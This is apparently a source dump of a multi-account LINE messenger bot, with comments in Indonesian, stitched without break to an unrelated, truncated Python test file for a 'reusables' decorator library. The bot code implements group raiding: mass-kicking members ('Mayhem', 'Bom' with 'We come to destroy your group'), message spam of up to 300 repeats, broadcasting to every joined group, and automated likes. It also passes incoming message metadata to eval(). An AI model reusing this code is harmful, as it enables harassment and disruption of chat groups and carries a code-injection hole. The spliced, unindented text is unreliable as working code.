string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki2.getProfile()
profile.statusMessage = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki3.getProfile()
profile.statusMessage = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki4.getProfile()
profile.statusMessage = string
ki4.updateProfile(profile)
cl.sendText(msg.to,"Bio berubah menjadi " + string + "")
elif msg.text in ["Join","one","One"]:
if msg.from_ in admin or Bots:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
cl.updateGroup(G)
elif msg.text in ["All"]:
if msg.from_ in Bots or staff:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
cl.updateGroup(G)
#-----------------------------------------------
elif msg.text in ["Bye wm"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
ki6.leaveGroup(msg.to)
ki7.leaveGroup(msg.to)
ki8.leaveGroup(msg.to)
ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
cl.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif msg.text in ["Bye"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
#-------------Fungsi Tagall User Start---------------#
elif msg.text in ["Cipok","Tagall"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
#-------------Fungsi Tag All Finish---------------#
elif msg.text in ["Bot Like", "Bot like"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in staff:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Owner")
try:
likePost()
except:
pass
elif msg.text in ["Like", "Bot like temen"]: #Semua Bot Ngelike Status Teman
if msg.from_ in staff:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Teman Boss")
try:
autolike()
except:
pass
#-----------------------------------------------
elif msg.text in ["Kill"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Sorry!!")
ki2.sendText(msg.to,"(´・ω・`)")
return
for jj in matched_list:
try:
klist=[ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#---------------kickall started----------------#
elif "Mayhem" in msg.text:
if msg.from_ in Bots or staff:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Mayhem","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
ki.sendText(msg.to,"「 Mayhem 」\nMayhem is STARTING♪\n abort to abort♪")
ki2.sendText(msg.to,"「 Mayhem 」\n46 victims shall yell hul·la·ba·loo♪\nhələbəˈlo͞o hələbəˌlo͞o")
ki3.sendText(msg.to,"Good Bye (*´・ω・*)")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to,"Not Found")
else:
for target in targets:
if target not in Bots and staff:
try:
klist=[ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki3.sendText(msg.to,"Mayhem done")
#-----------------------[Cleanse Edited By Toby]------------------------
elif ("Bom" in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Bom","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
ki.sendText(msg.to,"🔸We come to destroy your group🔸")
ki2.sendText(msg.to,"Relax slow slow no baper...😂😂")
ki3.sendText(msg.to,"Kenapa diem aja?")
ki4.sendText(msg.to,"Tangkis Bego Jangan Gemeter...😘")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
ki4.sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Hm..")
#----------------kickall finish----------------------#
elif "Kickuk" in msg.text:
if msg.from_ in admin or staff:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Kickuk","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
#ki.sendText(msg.to,"Just some casual cleansing ô")
#ki2.sendText(msg.to,"Group cleansed.")
#ki3.sendText(msg.to,"Fuck You All")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found.")
ki2.sendText(msg.to,"Not found.")
ki3.sendText(msg.to,"Not found.")
else:
for target in targets:
if target not in Bots and admin:
try:
klist=[ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Group cleanse")
ki2.sendText(msg.to,"Group cleanse")
ki3.sendText(msg.to,"Group cleanse")
elif "Nk " in msg.text:
if msg.from_ in Bots or staff:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
klist=[cl,ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Sorry...")
ki3.sendText(msg.to,"(´・ω・`)")
#-----------------------------------------------
elif "Vk " in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
pass
elif "Blacklist @ " in msg.text:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = ki2.getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
k3.sendText(msg.to,"Succes ")
except:
ki.sendText(msg.to,"error")
elif "Banned @" in msg.text:
if msg.from_ in Bots or staff:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
#ki.sendText(msg.to,"Dilarang Banned Bot")
#ki2.sendText(msg.to,"Dilarang Banned Bot")
#ki3.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun telah sukses di banned")
except:
ki.sendText(msg.to,"Error")
#----------------Mid via Tag--------------
elif "Mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
random.choice(KAC).sendText(msg.to, g.mid)
else:
pass
#-----------------------------------------
elif msg.text in ["Clear ban"]:
if msg.from_ in admin:
wait["blacklist"] = {}
random.choice(KAC).sendText(msg.to,"Clear All Ban Done")
#----------------Fungsi Unbanned User Target Start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
ki.sendText(msg.to,"Tidak Ditemukan.....")
kk.sendText(msg.to,"Tidak Ditemukan.....")
kc.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#----------------Fungsi Unbanned User Target Finish-----------------------#
#-------------Fungsi Broadcast Start------------#
elif "Bc " in msg.text: #NgeBC Ke semua Group yang di Join :D
if msg.from_ in staff:
bctxt = msg.text.replace("Bc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = ki2.getGroupIdsJoined()
a = ki3.getGroupIdsJoined()
a = ki4.getGroupIdsJoined()
a = ki5.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
ki2.sendText(taf, (bctxt))
ki3.sendText(taf, (bctxt))
ki4.sendText(taf, (bctxt))
ki5.sendText(taf, (bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#------------ Keluar Dari Semua Group------
elif msg.text in ["FAF out","Op bye"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in admin:
#gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
gid = ki3.getGroupIdsJoined()
gid = ki4.getGroupIdsJoined()
gid = ki5.getGroupIdsJoined()
for i in gid:
ki5.leaveGroup(i)
ki4.leaveGroup(i)
ki3.leaveGroup(i)
ki2.leaveGroup(i)
ki.leaveGroup(i)
#cl.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sayonara")
else:
cl.sendText(msg.to,"He declined all invitations")
#-----------------------------------------------
elif msg.text in ["Test"]:
ki.sendText(msg.to,"Ok double thumbs up")
ki2.sendText(msg.to,"Ok double thumbs up")
ki3.sendText(msg.to,"Ok double thumbs up")
#-----------------------------------------------
#elif "Bc " in msg.text:
#bctxt = msg.text.replace("Bc ","")
#ki.sendText(msg.to,(bctxt))
#ki2.sendText(msg.to,(bctxt))
#ki3.sendText(msg.to,(bctxt))
#-----------------------------------------------
elif msg.text in ["say hi"]:
ki.sendText(msg.to,"Hi buddy Har Har")
ki2.sendText(msg.to,"Hi buddy Har Har")
ki3.sendText(msg.to,"Hi buddy Har Har")
#-----------------------------------------------
elif msg.text in ["say hinata pekok"]:
ki.sendText(msg.to,"Hinata pekok Har Har")
ki2.sendText(msg.to,"Hinata pekok Har Har")
ki3.sendText(msg.to,"Hinata pekok Har Har")
elif msg.text in ["#welcome"]:
ki.sendText(msg.to,"Selamat datang di Chivas Family Room")
kk.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
#-----------------------------------------------
elif msg.text in ["Respon","respon"]:
ki.sendText(msg.to,"F.A.F ACTIVE")
ki2.sendText(msg.to,"F.A.F ACTIVE")
ki3.sendText(msg.to,"F.A.F ACTIVE")
ki4.sendText(msg.to,"F.A.F ACTIVE")
ki5.sendText(msg.to,"F.A.F ACTIVE")
#-----------------------------------------------
elif "Spam " in msg.text:
if msg.from_ in Bots or staff:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 300:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Kelebihan batas:v")
elif txt[1] == "off":
if jmlh <= 300:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Kelebihan batas :v")
elif msg.text == "Setp":
cl.sendText(msg.to, "Setpoint Telah Dipasang")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "Cek":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "==== Tercyduk ==== %s\n\n==== Tersangka ====\n%s\n\nSetpoint Pada :\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Setpoint Dulu Tolol (Har Har) 「Setp」")
pass
elif msg.text in ["Sp","Speed","speed"]:
if msg.from_ in Bots:
start = time.time()
print("Speed")
elapsed_time = time.time() - start
cl.sendText(msg.to, "Progress...")
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
elif "Add staff @" in msg.text:
if msg.from_ in Bots:
print "[Command]Staff add executing"
_name = msg.text.replace("Add staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove staff @" in msg.text:
if msg.from_ in Bots:
print "[Command]Staff remove executing"
_name = msg.text.replace("Remove staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Add admin @" in msg.text:
if msg.from_ in Bots:
print "[Command]admin add executing"
_name = msg.text.replace("Add admin @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the admin list")
except:
pass
print "[Command]admin add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove admin @" in msg.text:
if msg.from_ in Bots:
print "[Command]admin remove executing"
_name = msg.text.replace("Remove admin @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the admin list")
except:
pass
print "[Command]admin remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Stafflist","stafflist"]:
if staff == []:
ki.sendText(msg.to,"The stafflist is empty")
else:
ki.sendText(msg.to,"Staff list:")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
ki.sendText(msg.to,mc)
print "[Command]Stafflist executed"
elif msg.text in ["Admin list","admin list"]:
if admin == []:
ki.sendText(msg.to,"The stafflist is empty")
else:
ki.sendText(msg.to,"Admin list:")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
ki.sendText(msg.to,mc)
print "[Command]Adminlist executed"
elif msg.text in ["Ip Like", "Ar like"]:
if msg.from_ in staff:
print "[Command]Like executed"
cl.sendText(msg.to,"Trying to Like post(s) from staff")
try:
likePost()
except:
pass
#------------------------------------------------------------------
elif msg.text in ["Banned"]:
if msg.from_ in admin or staff:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Unbanned"]:
if msg.from_ in admin or staff:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact")
#---------Fungsi Banlist With Tag--------#
elif msg.text in ["Banlist","ip banlist"]:
if wait["blacklist"] == {}:
ki.sendText(msg.to,"No user is Blacklisted")
else:
ki.sendText(msg.to,"Blacklisted user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +ki.getContact(mi_d).displayName + "\n"
ki.sendText(msg.to,mc)
print "[Command]Banlist executed"
#---------Fungsi Banlist With Tag Finish--------#
elif msg.text in ["Cek ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text in ["Kill"]:
if msg.from_ in admin or staff:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"There was no blacklist user")
#ki2.sendText(msg.to,"There was no blacklist user")
#ki3.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
ki.sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ki.cancelGroupInvitation(msg.to,[_mid])
ki.sendText(msg.to,"I pretended to cancel and canceled.")
elif "album→" in msg.text:
try:
albumtags = msg.text.replace("album���","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "midb:" in msg.text:
midd = msg.text.replace("midb:","")
wait["blacklist"][midd] = True
elif "#終了" in msg.text:
try:
import sys
sys.exit()
except:
pass
if op.type == 55:
print "[NOTIFIED_READ_MESSAGE]"
try:
if op.param1 in wait2['readPoint']:
Nama = cl.getContact(op.param2).displayName
if Nama in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n-> " + Nama
wait2['ROM'][op.param1][op.param2] = "-> " + Nama
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
cl.sendText
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2(now=None):
    """Return True while the clock-name updater should keep waiting.

    Returns False exactly when the minute is a 10-minute boundary
    (:00, :10, :20, :30, :40, :50), True otherwise.

    Args:
        now: optional datetime to evaluate; defaults to datetime.now().
             (Backward-compatible addition — existing no-arg callers are
             unaffected — and makes the function deterministic to test.)

    Bug fix: the original sliced ``nowT[14:]`` on a 2-character minute
    string ("%M" yields e.g. "07"), which is always "" and never matched
    the boundary list, so the function unconditionally returned True.
    """
    if now is None:
        now = datetime.now()
    minute = datetime.strftime(now, "%M")
    return minute not in ["10", "20", "30", "40", "50", "00"]
def nameUpdate():
    """Background worker: while the "clock" feature is enabled, append the
    current (HH:MM) time to the account's display name, roughly every
    10 minutes.

    NOTE(review): runs forever and relies on module-level globals `cl`
    (the LINE client) and `wait` (feature-flag/state dict). The bare
    except keeps the daemon thread alive on any failure (best-effort);
    errors are silently discarded.
    """
    while True:
        try:
            #while a2():
            #pass
            if wait["clock"] == True:
                now2 = datetime.now()
                # e.g. "(13:37)" — appended after the stored base name
                nowT = datetime.strftime(now2,"(%H:%M)")
                profile = cl.getProfile()
                profile.displayName = wait["cName"] + nowT
                cl.updateProfile(profile)
            # Sleep 10 minutes between updates.
            # NOTE(review): original indentation was lost in this dump —
            # the sleep is assumed to run every iteration; confirm it was
            # not nested inside the `if` block.
            time.sleep(600)
        except:
            pass
# Launch the clock display-name updater in the background. daemon=True so
# the thread does not keep the process alive when the main loop exits.
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
def autolike():
    """Like and comment on every not-yet-liked post among the 20 most
    recent timeline activities, from both the `cl` and `ki` accounts.

    Relies on module-level globals `cl` and `ki` (LINE clients).
    Errors on individual posts are swallowed so one failure does not
    stop the sweep.
    """
    # Fetch the timeline ONCE. The original re-queried cl.activity(limit=20)
    # on every loop iteration — 20 identical network round-trips for the
    # same data (and an index into a potentially shifting list).
    hasil = cl.activity(limit=20)
    for zx in range(0, 20):
        post = hasil['result']['posts'][zx]
        if post['postInfo']['liked'] == False:
            try:
                author = post['userInfo']['mid']
                post_id = post['postInfo']['postId']
                cl.like(author, post_id, likeType=1002)
                cl.comment(author, post_id, "Auto Like by Fras\n\nhttp://line.me/ti/p/~fras88")
                ki.like(author, post_id, likeType=1002)
                ki.comment(author, post_id, "Auto Like by Fras\n\nhttp://line.me/ti/p/~fras88")
                print("Like")
            except Exception:
                # Best-effort: skip posts that fail (narrowed from a bare
                # except so KeyboardInterrupt/SystemExit still propagate).
                pass
        else:
            print("Already Liked")
        # Throttle between posts to avoid server rate limiting.
        time.sleep(0.60)
#thread2 = threading.Thread(target=autolike)
#thread2.daemon = True
#thread2.start()
#--------------------
def likePost():
    """Like (from all six bot accounts) every not-yet-liked post among the
    20 most recent timeline activities that was authored by an `owner`
    account, then leave a comment from the main account.

    Relies on module-level globals `cl`, `ki`..`ki5` (LINE clients) and
    `owner` (collection of owner mids).
    """
    # Fetch the timeline ONCE. The original re-queried cl.activity(limit=20)
    # on every loop iteration — 20 identical network round-trips.
    hasil = cl.activity(limit=20)
    for zx in range(0, 20):
        post = hasil['result']['posts'][zx]
        if post['postInfo']['liked'] == False:
            if post['userInfo']['mid'] in owner:
                try:
                    author = post['userInfo']['mid']
                    post_id = post['postInfo']['postId']
                    # Same like from every account, main account comments.
                    for account in (cl, ki, ki2, ki3, ki4, ki5):
                        account.like(author, post_id, likeType=1002)
                    cl.comment(author, post_id, "Auto like by ^F.A.F^\nStatus Boss udah Kami Like\nOwner Kami :\nFras")
                    print("Like")
                except Exception:
                    # Best-effort: a failing post must not stop the sweep.
                    pass
        else:
            print("Status Sudah di Like BOS")
# Main long-poll loop: repeatedly fetch up to 5 pending operations from the
# LINE server and dispatch each to bot(). Runs until the process is killed.
while True:
    try:
        Ops = cl.fetchOps(cl.Poll.rev, 5)
    except EOFError:
        # An EOF from the poll endpoint usually means the stored revision
        # cursor is stale or invalid — abort loudly with the current value.
        raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
    for Op in Ops:
        if (Op.type != OpType.END_OF_OPERATION):
            # Advance the revision cursor so the next poll resumes after the
            # newest operation seen, then handle the operation.
            cl.Poll.rev = max(cl.Poll.rev, Op.revision)
            bot(Op)
|
test_wrappers.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import os
from .common_test_data import *
from reusables import unique, lock_it, time_it, queue_it, setup_logger, \
log_exception, remove_file_handlers, retry_it, catch_it, ReusablesError
@unique(exception=OSError, error_text="WHY ME!")
def unique_function_1(a):
    """Identity helper; @unique raises OSError("WHY ME!") when the same
    value is returned a second time (exercised in test_unique)."""
    return a
@unique(alt_return=33)
def unique_function_2(a):
    """Identity helper; @unique returns the alternative value 33 instead of
    raising when the same value is returned a second time."""
    return a
@unique(wait=1)
def unique_function_3():
    # Returns the current epoch second; wait=1 makes @unique block until the
    # value differs from the previous call's result.
    return int(time.time())
class TestWrappers(BaseTestClass):
    """Tests for the decorator helpers exported by ``reusables``."""

    @classmethod
    def tearDownClass(cls):
        # Best-effort removal of the log file created by the logging tests.
        try:
            os.unlink("out.log")
        except OSError:
            pass

    def test_unique(self):
        """@unique raises / returns the configured alternative on repeats."""
        unique_function_1(1)
        unique_function_2(1)
        try:
            unique_function_1(1)
        except OSError as err:
            assert "WHY ME!" in str(err)
        assert unique_function_2(1) == 33
        # unique_function_3 uses wait=1, so successive calls must yield
        # strictly increasing timestamps.
        a = unique_function_3()
        b = unique_function_3()
        c = unique_function_3()
        assert c > b > a

    def test_locker(self):
        """@lock_it serialises two concurrent 2s calls: total exceeds 3s."""
        import threading

        @lock_it()
        def func1():
            import time
            time.sleep(2)

        start = time.time()
        a = threading.Thread(target=func1)
        b = threading.Thread(target=func1)
        a.daemon = False
        b.daemon = False
        a.start()
        b.start()
        a.join()
        b.join()
        assert (time.time() - start) > 3

    def test_time(self):
        """@time_it(append=...) records exactly one float duration per call."""
        my_list = []

        @time_it(append=my_list)
        def func():
            return 5 + 3

        @time_it(log=True)
        def func2():
            return 7 + 3

        func()
        func2()
        assert len(my_list) == 1
        assert isinstance(my_list[0], float)

    def test_queue(self):
        """@queue_it puts the wrapped function's return value on the queue."""
        # Py2/Py3 compatible queue import.
        try:
            import queue
        except ImportError:
            import Queue as queue
        q = queue.Queue()

        @queue_it(q)
        def func():
            return 5 + 3

        func()
        assert q.get() == 8

    def test_log_exception(self):
        """
        Validate the custom log exception is raised correctly.
        """

        @log_exception()
        def unique_function_4():
            raise Exception("Bad")

        try:
            unique_function_4()
        except Exception as err:
            assert "Bad" in str(err)

    def test_log_exception_message(self):
        """
        Validate the message passed to the custom log exception is written
        correctly in the logs.
        """
        setup_logger("my_logger", file_path="out.log")
        message = "I would like to take this moment to say something " \
                  "interesting has happened. "

        @log_exception("my_logger", message=message)
        def unique_function_5():
            raise Exception("Interesting")

        try:
            unique_function_5()
        except Exception:
            pass
        # Release the file handler before reading/removing the log file.
        remove_file_handlers("my_logger")
        with open(os.path.join("out.log"), "r") as f:
            assert message in f.readlines()[0]
        os.remove(os.path.join("out.log"))

    def test_retry_it(self):
        """@retry_it retries failing calls, then raises ReusablesError."""

        @retry_it()
        def a():
            return True

        def handle(herg):
            return False

